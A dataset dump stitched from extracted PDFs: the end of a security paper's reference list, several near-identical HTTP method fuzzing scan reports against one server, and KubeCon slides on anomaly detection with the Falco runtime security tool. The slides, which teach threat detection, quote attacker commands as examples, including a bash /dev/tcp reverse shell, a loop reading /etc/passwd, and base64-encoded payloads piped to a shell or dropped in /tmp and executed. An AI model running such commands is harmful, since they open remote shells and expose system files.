the 16th ACM conference\non Computer and communications security (2009), ACM, pp. 199–212.\n[46] RUTKOWSKA , J. Intel x86 considered harmful, 2015.\nhttps://blog.invisiblethings.org/papers/2015/x86 harmful.pdf.\n[47] SCHEAR , N., C ABLE , II, P. T., M OYER , T. M., R ICHARD , B., AND\nRUDD, R.Bootstrapping and maintaining trust in the cloud. In Proceed-\nings of the 32Nd Annual Conference on Computer Security Applications\n(New Y ork, NY , USA, 2016), ACSAC ’16, ACM, pp. 65–77.\n[48] SOFTLAYER . Big data solutions. http://www.softlayer.com/big-data,\n2015.\n[49] WAGNER , H., Z ACH, D.-I. M., AND LINTENHOFER , D.-I. F. M.\nA.-P. BIOS-rootkit LightEater.\n[50] WEIL, S. A., B RANDT , S. A., M ILLER , E. L., L ONG, D. D., AND\nMALTZAHN , C.Ceph: A scalable, high-performance distributed file\nsystem. In Proceedings of the 7th symposium on Operating systems\ndesign and implementation (2006), USENIX Association, pp. 307–320.\n[51] WOJTCZUK , R., AND RUTKOWSKA , J. Attacking intel trusted\nexecution technology. Black Hat DC (2009).\n[52] XU, Y., C UI, W., AND PEINADO , M. Controlled-channel attacks:\nDeterministic side channels for untrusted operating systems. In Proceed-\nings of the 36th IEEE Symposium on Security and Privacy (Oakland)\n(May 2015), IEEE Institute of Electrical and Electronics Engineers." } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 2 2021-04-19 20_18_17.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 2\nin REST Project 3/https://164.90.157.161 Test Suite/https://164.90.157.161 Test Case 1\nSummary\nStarted at 2021-04-19 20:18:17\nTime taken 00:04:59.353\nTotal scans performed: 2189\nIssues found: 2\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingRequest 1 2 2\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest OPTIONS https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/deepfence/v1.5/scope\nRequest HEAD https://164.90.157.161/deepfence/v1.5/scope HTTP/1.1\nTest Step Request 1\nModified \nParametersName Value\nmethod HEAD\nResponse No content\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #2" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-14 18_11_30.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin Project 1/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 18:11:30\nTime taken 00:00:08.744\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest POST https://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 1 2021-04-14 20_04_13.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 1\nin Project 7/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-14 20:04:13\nTime taken 00:04:32.546\nTotal scans performed: 2042\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot UNLOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. UNLOCK\nIssue Number #3\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest LOCK https://164.90.157.161/ HTTP/1.1Test Step GET\nModified \nParametersName Value\nmethod LOCK\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot LOCK /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.LOCK\nIssue Number #4\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PROPFIND https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PROPFIND\nResponseContent-type: text/html; charset=utf-8\n144 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PROPFIND /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. PROPFIND\nIssue Number #5\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PATCH https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PATCH\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PATCH /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PATCH\nIssue Number #6Scan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest TRACE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod TRACE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot TRACE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.TRACE\nIssue Number #7\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest OPTIONS https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod OPTIONS\nResponseContent-type: text/plain\n2 Content length: \nFull response:\nok\nAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. OPTIONS\nIssue Number #8\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest HEAD https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod HEAD\nResponse No contentAlerts Valid HTTP Status Codes: Response status code: 200 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.HEAD\nIssue Number #9\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest DELETE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod DELETE\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot DELETE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource. DELETE\nIssue Number #10\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PUT https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PUT\nResponseContent-type: text/html; charset=utf-8\n139 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PUT /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PUT\nIssue Number #11\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest POST https://164.90.157.161/ HTTP/1.1\nTest Step GETModified \nParametersName Value\nmethod POST\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot POST /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.POST\nIssue Number #12" } ]
{ "category": "Provisioning", "file_name": "kubeconna23-anomaly-detection-slides.pdf", "project_name": "Falco", "subcategory": "Security & Compliance" }
[ { "data": "A Wind of Change for Threat Detection \nMelissa Kilby \nServices Security Engineering - Apple \nTuesday November 7, 2023 12 /colon.uc10pm - 12 /colon.uc45pm CST \n(W375ab - Security Track)\nThe Falco Project\nArtificial Intelligence is on fireA work in progress …\n… detecting cyber attacks at scaleLinux Infrastructure Layer\nidentity management systemsauthentication systemsbuild systemsnetwork devicesnetwork storagesource control systemsdatabase systemsbackend app serversnetwork proxy serversdata centersLinux Security Monitoring - “Kernel Events Never Lie”\nCPUSystem CallSystem CallSystem CallMemoryHard DiskApp Process\nKernelApp ProcessApp ProcessApp ProcessLargest gateway to kernel from userspaceHistorical Process Execution\n…/bin/java/bin/sh/bin/sh\n/usr/bin/tee\n/bin/dash\n/usr/bin/tee\n \n \n proc.name: sh \nproc.exepath: /bin/sh \nproc.cmdline: sh -c echo \nf0VMRgEBAQAAAA[TRUNCATED]AAFhqAGoFieMxyc2AhcB5vesn\nsge5ABAAAInjwesMweMMsH3NgIXAeBBbie[TRUNCATED]AAM2A \n| tee /tmp/Qhhg.b64Historical Process ExecutionHistorical Process Execution\n…/bin/java/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh/bin/sh\n/usr/bin/tee \n proc.name: sh \n proc.exepath: /bin/sh \n proc.cmdline: sh -c base64 -d /tmp/Qhhg.b64|tee /tmp/Qhhg \n/bin/dash\n/usr/bin/teeHistorical Process ExecutionHistorical Process Execution\n…/bin/java/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh /bin/sh \n proc.name: sh \n proc.exepath: /bin/sh \n proc.cmdline: sh -c chmod +x /tmp/Qhhg \n/bin/dashHistorical Process ExecutionHistorical Process Execution\n…/bin/java/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh\n/bin/shNetwork \nConnect \nEvent/bin/sh\n/tmp/Qhhg/bin/sh/bin/dashNetwork Connect \nEvent\n \n proc.name: sh \n proc.exepath: /bin/sh \n proc.cmdline: sh \n \nREVERSE SHELL\n…/bin/java/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh\n/bin/sh/questionmark\n/questionmark/bin/bashNetwork \nConnect \nEvent/usr/bin/python2.7/bin/uname\nREVERSE SHELL\n/bin/sh\n/tmp/Qhhg/bin/shHistorical Process ExecutionThe Falco Project\nproc.aname: java -> sh -> sh -> python2.7 -> bash -> unameLinux Kernel View Mirror: The Now of the Process Tree\n…/bin/java\n/bin/sh/bin/bashNetwork \nConnect \nEvent/usr/bin/python2.7/bin/uname\nREVERSE SHELL\n/bin/shpidppid…Process/Thread n\nThe Falco Project\npidppid…Process/Thread n\npidppid…Process/Thread nLinux Kernel View Mirror: Falco’s Process/Thread Cache\npid = Linux process identifier \nppid = Linux parent process identifierThe Falco Project\npidppid…Process/Thread n\npidppid…Process/Thread n\npidppid…Process/Thread nPurge Process/Thread on exit\nLinux Kernel View Mirror: Falco’s Process/Thread Cache\npid = Linux process identifier \nppid = Linux parent process identifierpidppid…Process/Thread n\nThe Falco Project\npidppid…Process/Thread n\npidppid…Process/Thread n\nBroken LinksLinux Kernel View Mirror: Falco’s Process/Thread Cache\npid = Linux process identifier \nppid = Linux parent process identifierWhat can we detect with the right Falco rules /questionmark\nRemote Code \nExecutionThe Falco Project\nWhat can we detect with the right Falco rules /questionmark\nSecrets Lifting\nThe Falco Project\nWhat can we detect with the right Falco rules /questionmark\nPrivilege \nEscalation\nThe Falco Project\nWhat can we detect with the right Falco rules /questionmark\nSandbox Escape\nThe Falco Project\nWhat can we detect with the right Falco rules /questionmark\nLateral \nMovement\nThe Falco Project\nWhat can we detect with the right Falco rules /questionmark\nUnauthorized \nAccess\nThe Falco Project\nWhat can we detect with the right Falco rules /questionmark\ndetect known \ninfrastructure \nattacksThe Falco Project\nWhat does doing nothing cost you /questionmarkRaising the Bar \nSelf-T agging of Normal App BehaviorTune your rules, or be tuned out …\nTune your rules, or be tuned out …\n$ echo “detect abnormal file opens” \n$ ./demo1Tune your rules, or be tuned out …\nself-tagging \nnormal application \nbehavior\nInformation AsymmetryInformation Asymmetry\nTo Defenders Advantagevaluable \ninformation \nencoding\nMore information, more possibilitiesMore information, more possibilities\nDetect unusual file opens to find Arbitrary \nFile Reads -- an entire family of attacks. \nWe can quantify \"unusual\" as less common \nin the application's context because we \ncan access and encode more information \nefficiently and compactly.\nRule-based detections focus on what we think \nattackers will do, not on what they are doing/questionmark\n…because “found data” is not enough……need relevant , structured , and \ncontextual data to detect today's \ncyber attacks…… defining the “right data” \nproves to be challenging…\n…speeding up the novelty discovery \nand adaptation cycle will be very helpful/questionmark\nStaying ahead in Linux runtime \nmonitoring and detecting cyber \nattacks is hard …\nAttackers don’t play by rulesdetect what we \ndon’t know\nAttackers don’t play by rulesRaising the Bar\nvaluable \ninformation \nencoding\ndetect what we \ndon’t knowSelf-tagging \nnormal app \nbehavior\ndetect known \ninfrastructure \nattacksA Peek into the Work In Progress for Falco\nThe Falco Project\nhttps://github.com/falcosecurity/libs/pull/1453\nwip: new(userspace/libsinsp): MVP CountMinSketch Powered Probabilistic Counting and FilteringAdvanced kernel event data analytics that's \nbuilt for the real world, not the award shelfAnalyze behaviors outside the past behavior… process attributes …… process attributes …\n… unusual app process attributes …Data Compression Requirements\nMinimum accuracy guarantees — performance more important \nData Structure w/ efficient time and space complexity \nCounters of 64bit, ideally just 32bit \nUse established algorithms proven to be useful in real-life production \nSupport different data types (strings, numeric numbers, bool…) CountMinSketch - Fixed space data structure\nWidth = w buckets (NUMBUCKETS)Depth = d Hash Functions\nBias\nw = ceil(e / /epsilon.grek) -> where e is the base of the natural logarithm, /epsilon.grek is the desired error rated = ceil(ln(1/ /delta.grek)) -> /delta.grek is the desired probability of failureCountMinSketch - Update counts\nmatrix[d][hash%NUMBUCKETS]++New itemWidth = w buckets (NUMBUCKETS)CountMinSketch - Get count estimates\nGet the min value (point query)Width = w buckets (NUMBUCKETS)\nk heavy hitters \nor \nsimple thresholdsCountMinSketch - Decisions\nIn runtime Threat Detection approx knowing recurring high volume patterns is a huge win /exclamationmarkNo undercounting - prone to overcounting - perfect for heavy hitters detection in skewed distributions\nk heavy hitters \nor \nsimple thresholdsCountMinSketch - T ake Away\n> Less Memory \n> Fixed Memory\n> Overcounting within error \n> Safety boundary\n> Won’t blow up in productionCountMinSketch - How To Runtime Threat Detection\nOne shared set of sketches per host\nSketch 1\nSketch 2Sketch n\n……/bin/java/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh/bin/sh\n/usr/bin/tee\n/bin/sh\n/bin/sh/questionmark\n/questionmark/bin/bashNetwork \nConnect \nEvent/usr/bin/python2.7/bin/uname\nREVERSE SHELL\n/bin/sh\n/tmp/Qhhg/bin/shWhat are we counting /questionmarkproc.args: \nNot always available. \nMore challenging to model due to noise. \nGreater numbers of arguments and \nhigher average counts provide more \ninformation and context from the \narguments. Reflective of a compressed encoding \nof the context of a process. \nOptional inclusion of file paths or \nnetwork connection tuples for high-\npriority use cases related to file \ndescriptor actions. CountMinSketch - How To Runtime Threat Detection\ncontainer.id \nproc.name \nproc.exepath \nproc.tty \nproc.vpgid.name \nproc.sname \nproc.pname \nproc.aname[2] \nproc.aname[3] \nproc.aname[4] fd.namecontainer.id \nproc.args attacker command (typed into terminal) command line (process name + cmd args)bash -i >& /dev/tcp/<ip>/1337 0>&1 bash -iecho \"string\"while read -r line; do echo \"$line\"; done < /etc/\npasswd;ALL_PROXY=socks5://127.0.0.1:9999 curl https://\n<domain> curl https://<domain>echo \n'cHl0aG9uIC1jICJleGVjKGFXMXdiM0owSUc5ekxITnpiQW89L\nmRlY29kZShiYXNlNjQpKSIgPi9k \nZXYvbnVsbCAyPiYxICYK' | base64 —decode | sh(1) sh \n(2) base64 —decode \n(3) python -c \nexec(‘aW1wb3J0IG9zLHNzbAo='.decode('base64'))Shell Input Encoding Challenge- rule: Abnormal File Open \n condition: > \n open_read \n and fd.sketch0.count < threshold1 CountMinSketch Powered Falco Rules\n and proc.sketch2.count < threshold2) Process context + fd.name countsSketch 0proc.args count summary statsSketch 1$ echo “detect command injection” \n$ ./demo2More information, more possibilitiesProposal ๏Projects best interest \n๏Solve a relevant and \nbroad set of problems \nin Falco \n๏Design \n๏Early POCDevelopment๏Start development \n๏Incorporate early \nfeedback \n๏Create test suites to \nbuild trust and \nshowcase benefitsExperimental Release๏Expose new \ncapabilities to early \nadopters \n๏Revise and/or expand \ncapabilities \n๏The new framework \nshould be extensible \nby the communityOfficially Supported๏If this stage is reached, it \nmeans that the community \nhas deemed the new \nfeature useful \n๏New feature meets strict \nproduction requirements \nwith a reasonable \nperformance-accuracy \ntrade-offHow to go about contributing to OSS Falco /questionmark> Learning \n> Learn normal high-frequency application behavior \n> Access more information on the host to define behavior \n> Increase the chances of detecting unknown attacks\n> Velocity & Scalability \n> Adaptation and novelty discovery \n> Automated traditional tuning\n> Reduce Cost \n> Avoid infeasible compute in data lakes\nSummaryQ&A\n" } ]
{ "category": "Provisioning", "file_name": "Security Report for Security Test 2 2021-04-16 11_51_01.pdf", "project_name": "ThreatMapper", "subcategory": "Security & Compliance" }
[ { "data": "Issues report for Security Test 2\nin 164.90.157.161-withUsernamePassword/Security Test Suite 1/https://164.90.157.161 TestCase\nSummary\nStarted at 2021-04-16 11:51:01\nTime taken 00:00:07.634\nTotal scans performed: 62\nIssues found: 12\nScan Issues Found In Test StepsTotal Issues \nFound\nHTTP Method \nFuzzingGET 12 12\nDetailed Info\nIssues are grouped by Security scan.\nHTTP Method Fuzzing\nAn HTTP Method Fuzzing Scan attempts to use other HTTP verbs (methods) than those defined in \nan API. For instance, if you have defined GET and POST, it will send requests using the DELETE \nand PUT verbs, expecting an appropriate HTTP error response and reporting alerts if it doesn't \nreceive it.\nSometimes, unexpected HTTP verbs can overwrite data on a server or get data that shouldn't be \nrevealed to clients.\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest PURGE https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod PURGE\nResponseContent-type: text/html; charset=utf-8\n141 Content length: \nFull response:<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot PURGE /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.PURGE\nIssue Number #1\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest COPY https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod COPY\nResponseContent-type: text/html; charset=utf-8\n140 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot COPY /</pre> </body> </html>\nAlerts Valid HTTP Status Codes: Response status code: 404 is not in acceptable list of status codes\nAction Points You should check if the HTTP method should really be allowed for this resource.COPY\nIssue Number #2\nScan HTTP Method Fuzzing\nSeverity WARNING\nEndpoint https://164.90.157.161/\nRequest UNLOCK https://164.90.157.161/ HTTP/1.1\nTest Step GET\nModified \nParametersName Value\nmethod UNLOCK\nResponseContent-type: text/html; charset=utf-8\n142 Content length: \nFull response:\n<!DOCTYPE html> <html lang=\"en\"> <head> <meta charset=\"utf-8\"> <title>\nError</title> </head> <body> <pre>Cannot 